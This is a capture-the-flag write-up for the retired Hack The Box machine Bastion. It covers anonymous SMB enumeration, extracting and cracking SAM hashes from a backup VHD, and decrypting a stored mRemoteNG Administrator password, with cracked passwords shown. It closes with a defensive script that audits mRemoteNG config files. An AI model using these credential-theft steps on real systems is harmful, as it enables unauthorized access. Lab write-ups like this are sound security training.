Writeup for the retired HTB machine Bastion
Link: https://www.hackthebox.eu/home/machines/profile/186


A quick portscan reveals multiple open ports:

22/tcp  open  ssh
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds


A closer investigation of the SMB service reveals that it allows anonymous access and has message signing disabled, which in turn enables enumeration without credentials.

msf5 > use auxiliary/scanner/smb/pipe_auditor

The pipe auditor yields some interesting endpoints:

[+]      - Pipes: \netlogon, \lsarpc, \samr, \atsvc, \epmapper, \eventlog, \InitShutdown, \lsass, \LSM_API_service, \ntsvcs, \protected_storage, \scerpc, \srvsvc, \trkwks, \W32TIME_ALT, \wkssvc

msf5 > use auxiliary/scanner/smb/smb_enumshares

[-]      - Login Failed: Unable to Negotiate with remote host
[+]      - ADMIN$ - (DISK) Remote Admin
[+]      - Backups - (DISK) 
[+]      - C$ - (DISK) Default share
[+]      - IPC$ - (IPC) Remote IPC

So let’s look into the shares. First, let’s mount the Backups share:

sudo mount -t cifs -o user=guest // /mnt/

Inside, a backup of a full client machine can be found at WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351.

The Backup

The VHD in that directory was copied off and mounted read-only on Linux for closer investigation:

sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/guest/

With an offline Windows installation like this, it is possible to copy the registry hives from C:\Windows\system32\config\ and dump the NT hashes of the local users:

apalax@raudfjorden:~/writeups/HTB/Labs/Bastion$ pwdump SYSTEM SAM 

The output format is username:id:LM-hash:NT-hash. These lines are copied into hashes.txt and handed off to john for a dictionary attack:

john --format=nt hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje     (L4mpje)
2g 0:00:00:00 DONE (2019-09-05 19:36) 2.222g/s 10439Kp/s 10439Kc/s 10444KC/s burg772v..burdy1
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

So we now have a valid username / password combination.
Connecting via SSH with it drops us into a plain cmd.exe shell rather than PowerShell.
user.txt can be found on the desktop and printed with type user.txt.

Road to root

One attempt was to make use of Matt Graeber’s tool, PowerSploit.

First, PowerSploit needs to be downloaded:
wget -OutFile ps.zip
Then copy the Privesc folder into the PowerShell module path, import the module and run its checks:

Import-Module Privesc
Get-Command -Module Privesc
    <list of available commands>

[*] Checking %PATH% for potentially hijackable .dll locations...                                           

HijackablePath : C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\                                      
AbuseFunction  : Write-HijackDll -OutputFile 'C:\Users\L4mpje\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' -Command '...'    

This path did not work out. Poking around further, the SSH server configuration reveals:

Match Group administrators                                                                       
       AuthorizedKeysFile __PROGRAMDATA__/ssh/administrators_authorized_keys 

Unfortunately, we don’t have write access to that folder as this user, so another path to privilege escalation is needed.


A more thorough investigation reveals that mRemoteNG, a remote connection manager, is installed.
On closer examination it turns out that this software stores saved passwords insecurely.
The credentials are kept in its connection configuration file, confCons.xml:

PS C:\Users\L4mpje\AppData\Roaming\mRemoteNG> type .\confCons.xml

The stored value can be decrypted with mremoteng-decrypt.
This is done by handing the decrypter the encrypted password string from the Administrator’s connection entry:

python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" 
Password: thXLHM96BeKL0ER2

This yields the cleartext password for the Administrator account. Connect via SSH as Administrator, cd to the Desktop and print the flag with type root.txt.
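For the defensive side of the mRemoteNG finding above, here is an added audit helper (not part of this writeup and not mRemoteNG’s own code) that walks a confCons.xml and lists every connection entry that persists a password, together with the file-level encryption settings. The attribute names (Name, Type, Username, Hostname, Protocol, Password) and the mremoteng.org namespace follow the layout of a 2.6-era confCons.xml and are an assumption; the sample file is constructed and its password value is a placeholder.

```python
# Added audit helper: report stored credentials in an mRemoteNG confCons.xml.
# Unless the user set a custom master password, anyone who can read this file
# can recover the stored passwords, so every hit here is a credential to rotate
# and move out of the config file.
import xml.etree.ElementTree as ET

# Constructed sample in the assumed 2.6 layout; the Password value is a placeholder.
SAMPLE_CONFCONS = """<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections"
    EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000"
    FullFileEncryption="false" Protected="PLACEHOLDER" ConfVersion="2.6">
  <Node Name="DC_3" Type="Connection" Username="Administrator" Domain=""
        Password="PLACEHOLDER_ENCRYPTED_BLOB" Hostname="127.0.0.1" Protocol="RDP" />
  <Node Name="Lab" Type="Container">
    <Node Name="jump" Type="Connection" Username="ops" Domain="" Password=""
          Hostname="10.0.0.5" Protocol="SSH2" />
  </Node>
</mrng:Connections>
"""


def audit_confcons(xml_text):
    """Return (settings, findings): the file-level crypto attributes and one
    dict per Connection node whose Password attribute is non-empty."""
    root = ET.fromstring(xml_text)
    settings = {k: root.get(k) for k in
                ("EncryptionEngine", "BlockCipherMode",
                 "KdfIterations", "FullFileEncryption")}
    findings = []
    # iter() descends into Container nodes, so nested folders are covered too.
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        if node.get("Password"):            # empty string means nothing stored
            findings.append({"name": node.get("Name"),
                             "host": node.get("Hostname"),
                             "user": node.get("Username"),
                             "protocol": node.get("Protocol")})
    return settings, findings


if __name__ == "__main__":
    settings, findings = audit_confcons(SAMPLE_CONFCONS)
    print("file settings:", settings)
    for f in findings:
        print(f"stored credential: {f['user']}@{f['host']} "
              f"({f['protocol']}, entry '{f['name']}')")
```

Run it against a real confCons.xml by reading the file and passing its text to audit_confcons; an empty findings list means no connection entry persists a password.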